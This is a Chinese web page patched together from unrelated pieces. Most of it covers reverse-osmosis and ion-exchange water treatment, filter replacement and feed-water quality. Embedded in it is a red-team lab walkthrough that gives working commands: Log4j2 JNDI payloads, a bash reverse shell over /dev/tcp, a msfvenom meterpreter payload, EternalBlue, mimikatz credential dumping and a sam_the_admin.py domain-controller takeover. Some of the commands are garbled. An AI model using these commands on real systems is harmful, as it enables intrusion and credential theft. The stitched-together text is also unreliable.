本文目录一览:
用超滤+反渗透的除盐水工艺需要用到什么仪器仪表
超滤,用于截留水中胶体大小的颗粒,而水和低分子量溶质则允许透过膜。由膜表面机械筛分、膜孔阻滞和膜表面及膜孔吸附的综合效应,以筛滤为主。所以超滤不能做为脱盐设备,一般用在反渗透前做除盐水预处理设备。
如果在你的问题中选的话只能用离子交换树脂了。
离子交换法是以圆球形树脂(离子交换树脂)过滤原水,水中的离子会与固定在树脂上的离子交换。常见的两种离子交换方法分别是硬水软化和去离子法。硬水软化主要是用在反渗透(RO)处理之前,先将水质硬度降低的一种前处理程序。软化机里面的球状树脂,以两个钠离子交换一个钙离子或镁离子的方式来软化水质。 离子交换树脂利用氢离子交换阳离子,而以氢氧根离子交换阴离子;以包含磺酸根的苯乙烯和二乙烯苯制成的阳离子交换树脂会以氢离子交换碰到的各种阳离子(例如Na+、Ca2+、Al3+)。同样的,以包含季铵盐的苯乙烯制成的阴离子交换树脂会以氢氧根离子交换碰到的各种阴离子(如Cl-)。从阳离子交换树脂释出的氢离子与从阴离子交换树脂释出的氢氧根离子相结合后生成纯水。 阴阳离子交换树脂可被分别包装在不同的离子交换床中,分成所谓的阴离子交换床和阳离子交换床。也可以将阳离子交换树脂与阴离子交换树脂混在一起,置于同一个离子交换床中。不论是那一种形式,当树脂与水中带电荷的杂质交换完树脂上的氢离子及(或)氢氧根离子,就必须进行“再生”。再生的程序恰与纯化的程序相反,利用氢离子及氢氧根离子进行再生,交换附着在离子交换树脂上的杂质。
托玛琳净水机al-1000如何更换滤芯
方法/步骤
1、在更换之前,首先要关闭电镀球阀,按下冲洗按钮稍等十分钟左右,让系统自动减缓压力。
2、用手或工具旋开膜壳右方的螺帽接头,把水管拔出。
关闭压力桶球阀,以手或工具旋开其上方的螺帽接头,并将水管导入一个空桶或洗水槽内。
3、用手扶紧反渗透膜管,再用钳子(或专用工具)夹住旧的反渗透膜,将其用力拔出膜壳外。
4、打开新的反渗透膜的封套,将其取出。
5、将新开封的反渗透膜塞入反渗透膜管,直到有两个黑色小 “ O ” 型圈的一端顶到膜壳的底端为止。
6、以转开膜壳盖的相反方向,将膜壳盖旋紧。
7、塞入水管,并旋紧接头螺帽。(切记勿忘放管塞,快插接头除外)。
8、打开电镀球阀。让机器运转两小时以上,使系统进入正常造水状态后,再将水管与压力桶球阀连接并且打开压力桶球阀。
记一次log4j2引发的渗透测试
记一次log4j2打入内网并用CVE-2021-42287、CVE-2021-42278获取到DC权限的靶场渗透。
首先对web进行端口扫描,发现38080端口和22端口
访问一下38080端口发现是一个error page
用Wappalyzer看一下是什么架构,但是好像没有检测出来
拿着报错去百度上发现应该是springboot
索性用goby再去扫一下,应该是spring没错,但是没有漏洞是什么操作?联想到最近出的log4j2的洞,可能他只是一个日志文件所以并没有框架
使用 payload=${jndi:ldap://p9j8l8.dnslog.cn} 验证一下有回显证明存在漏洞
尝试进一步利用漏洞,首先起一个ldap服务,ip为本地接收shell的ip地址
pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 192.168.1.105/pre
抓包修改 Content-Type: appllication/x-www-form-urlencoded ,并执行以下payload成功回显
pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"payload=${jndi: ldap://192.168.1.105:1389/TomcatBypass/TomcatEcho }/pre
执行 ls -al / 看一下也成功
nc开启监听端口
然后使用bash命令反弹,这里需要先base64编码然后对编码后的特殊字符进行2层url转码
pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"bash -i /dev/tcp/192.168.1.105/9999 01/pre
抓包添加 payload=${jndi:ldap:1/192.168.1.105:1389/TomcatBypass/Command/Base64/二层转码之后的字符} ,即可得到反弹shell
进行信息搜集发现为docker环境,这里尝试了docker逃逸失败,那么继续进行信息搜集
在根目录下找到了第一个flag,这里有一个 got this ,在之前端口扫描的时候看到开放了22端口,尝试使用ssh直接连接
使用xshell尝试连接
连接成功,拿到了宿主机的权限
ifconfig查看网卡情况发现还有一张10.0.1.0/24段的网卡
这里方便的话其实可以使用cs上线linux后用cs继续打,这里我就没有上线cs,使用linux的命令对10.0.1.0/24段探测存货主机
pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;" for i in 10.0.1.{1..254}; do if ping -c 3 -w 3 i Find the target; fi; done/pre
ping一下是存活的
使用毒液把流量代理出来,首先开启监听
pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"admin.exe -lport 7777/pre
然后上传agent_linux到靶机上
加权并执行
pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"chmod 777 agent_linux_x86
agent_linux_x86 -rhost 192.168.1.105 -rport 7777/pre
连接成功
这里本来准备用毒液的代理到msf打的,后面觉得比较麻烦,就直接用kali生成的elf马上线msf了
首先生成一个32位的elf马
pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf shell.elf/pre
然后加权并执行
pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"chmod 777 shell.elf
./shell/pre
kali使用 exploit/multi/handler 进行监听
获取到宿主机的shell
然后添加10.0.1.0/24段的路由
pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"bg
route add 10.0.1.0 255.255.255.0 1
route print/pre
然后配置 proxychain4.conf 文件并使用socks模块
pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"search socks
use auxiliary/sevrer/socks_proxy
run/pre
我们在之前已经知道了内网主机的ip,那么这里我们直接使用proxychain配合nmap对10.0.1.7的端口进行扫描
pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"proxychains4 nmap -sT -Pn 10.0.1.7/pre
发现有445端口,那么对445端口进一步扫描
先确定一下系统版本,使用 auxiliary/scanner/smb/smb_version 模块,发现是win7 sp1
看能不能利用永恒之蓝,这里使用到 auxiliary/scanner/smb/smb_ms17_010 模块,发现可以利用永恒之蓝
使用 exploit/windows/smb/ms17_010_eternalbule 模块,因为是不出网环境,这里需要用到 bind_tcp 载荷
run之后拿到一个system权限的meterpreter
在 C:\Users\root\Desktop 下拿到第二个flag
然后继续进行信息搜集,发现同样是双网卡,还存在10.0.0.0/24段的一张网卡
ipconfig /all看到dns服务器为 redteam.lab 应该在域内
这里ping一下 redteam.lab 得到域控的ip为10.0.0.12
这里不知道域控有什么洞,先上传一个mimikatz把密码抓取出来,得到 Administrator/Admin12345 ,这里其实就可以使用域管账户ipc直接连接,但是这里抓到了一个域用户,尝试使用最新的CVE-2021-42287、CVE-2021-42278来进行攻击,关于漏洞的原理请 移步
pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"privilege::debug
sekurlsa::logonpasswords/pre
这里我准备使用noPac.exe直接去获取一个shell的,但是这里noPac.exe的利用条件是需要主机上有.net4.0环境,所以这里没有回显
本来准备一步一步的用原始的方法打的,但是powershell用不了没有回显,就写一下原始利用的步骤吧
这里直接使用 sam_the_admin.py 进行攻击
pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"proxychains python3 sam_the_admin.py "redteam/root:Red12345" -dc-ip 10.0.0.12 -shell/pre
即可拿到DC的shell
在 C:\Users\Administrator\Desktop 下找到最后一个flag
反渗透进水水质有哪些要求
水质分析报告包括水质类型和主要成分指标,所需指标包括溶解离子,硅,胶体,有机物(TOC) 。
典型溶解阴离子
碳酸氢根(HCO3-), 碳酸根(CO32-), 氢氧根(OH-), 硫酸根(SO42-), 氯离子(Cl-), 氟离子(F-), 硝酸根离子
(NO3-), 硫离子(S2-), 磷酸根(PO44-)。
典型溶解阳离子
钙离子(Ca2+), 镁离子(Mg2+), 钠离子(Na+),钾离子(K+), 铁离子(Fe2+ 或 Fe3+), 锰离子(Mn2+),
铝离子(Al3+), 钡离子(Ba2+), 锶离子(Sr2+), 铜离子(Cu2+)和 锌离子(Zn2+)。
碱度
包括负离子中的碳酸根、碳酸氢根、氢氧根,自然水体中的碱度主要由HCO3-形成。pH在8.3以下的水中,
碳酸氢根和二氧化碳平衡存在。当pH高于8.3时, HCO3-将转变为CO32-存在。如果原水PH达到11.3以上,
将存在OH- 形式。Ca(HCO3)2的溶解度大于CaCO3。如果原水在 RO系统中被浓缩, CaCO3容易沉淀在
系统中。所以投加阻垢剂或加酸调低PH值会经常在RO系统中使用。
铁和锰
通常在水中以二价溶解状态存在或以三价非溶解氢氧化物形成存在。Fe2+ 可能来源自井水本身或来自泵、
管路、水箱的腐蚀,尤其上游系统中投加了酸。如果原水中铁、锰浓度大于0.05mg/l并且被空气或氧化剂
氧化为Fe(OH)3 和 Mn(OH)2 ,当 pH 值偏高时会在系统中形成沉淀。分析表明铁锰的存在会加速氧化剂
对膜的氧化降解,因此在预处理中必须去除铁锰。
铝
一般不存在于自然水体中。三价铝会像三价铁一样在RO系统中形成难溶的Al(OH)3,当pH 在5.3 至8.5 范围
内时候,因为铝高价正电特性,所以Al2(SO4)3 和NaAlO2可以用于地表水的预处理去除水中负电性胶体。
千万小心铝盐不要过多投加,残留的铝离子对膜有污染。
铜和锌
在自然水体中很少存在。有时水中微量的铜和锌来自管道材料。在pH值5.3至8.5范围内,Cu(OH)2
和Zn(OH)2 不溶于水,因为它们一般在水中的含量较低,所以只有当系统长时间不清洗,它们积累到
一定程度时,才会对膜系统造成污染。可是如果铜锌与氧化剂(比如过氧化氢)同时存在于原水中,
那么会造成膜材质的严重降解。
硫化物
以H2S气体形式溶于水中,去除硫化氢可以用脱气装置或氯氧化或空气接触变为不溶性硫磺,用多介质过滤
去除。
磷酸盐
具有较强负电性,容易和多价离子形成难溶盐。磷酸钙在PH中性时溶解度很有限,PH值高时溶解度也不高。
进水中投加阻垢剂或调低PH(小于7)可以防止磷酸盐沉淀。
硅
存在大多数自然水体中,浓度从1至100㎎/L。而且PH低于9.0时主要以Si(OH)4 存在。当PH低时,硅酸可以
聚合形成硅胶体。当PH高于9.0时,它会分离成SiO32- 离子而且会和钙、镁、铁或铅形成沉淀。硅和硅酸盐
沉淀很难溶解。氟化氢胺溶液清洗硅垢比较有效,可是氟化氢胺溶液排放会造成环境污染。当进水中硅含量
超过20㎎/L时,要注意硅结垢的潜在危险。
胶体(悬浮物颗粒)分析
污染指数,是衡量RO进水中胶体(颗粒物)潜在污染性的重要指标。RO进水中的胶体是各种各样的,经常
包括细菌、黏土、硅胶体和铁腐蚀产物。预处理中的澄清器中会用一些化学品,例如明矾、三氯化铁或阳
离子型聚合剂来去除胶体污染或通过后续介质过滤器去除。
浊度
也是影响RO膜污染的一个重要指标。浊度仪工作原理是测量水样中悬浮物对光的散射。水样的浊度大于
1.0的原水可能对RO膜有污染,浊度仪测量数值的单位是NTU。象SDI 值一样,浊度也是表征膜污染潜在
风险的一个参数。高浊度并不表示悬浮物会沉淀在膜表面。
如果原水的SDI大于5而且浊度大于1.0,就必须在预处理单元的澄清工艺中加入混凝剂而且后面要使用
多介质过滤器。如果原水中SDI小于5,而且浊度小于1,那么预处理可以考虑介质过滤器和保安过滤器
而不一定投加混凝剂。预处理混凝剂的投加量也是有控制指标的,过量使用会对膜有污染。
原水中还有两个重要指标需要分析。细菌总数和有机物含量。有两种方法测定水中细菌数,一种是培养法,
另一种是荧光染色法,后者更常用因为很方便快捷。原水中的有机物一般是油类-表面活性剂、水溶性聚合物
和腐质酸。检测指标有总有机炭(TOC),生物耗氧量(BOD)和化学耗氧量(COD)。要想更精确地分析有
机物成份,需要使用液相色谱和气质联用仪器分析。如果原水中的TOC含量大于3mg/l,预处理单元要考虑去
除有机物工艺。
反渗透膜测试条件是什么呢
家用反渗透膜的测试条件概括为以下5点:
1、NaCl浓度:200mg/L,压力 60 psig,回收率15%, 温度25 oC, pH 6.5~7.0。
2、最小的脱盐率为96%。
3、干膜元件的真空泄漏实验以圣迭戈条例为标准,其性能同样稳定。
4、单支元件的产水量可能的变化范围±20% 。
5、所有膜元件真空、独立纸箱包装,湿膜元件内注入1%亚硫酸氢钠保护液.所有干膜产品均为聚乙烯袋包装,无真空处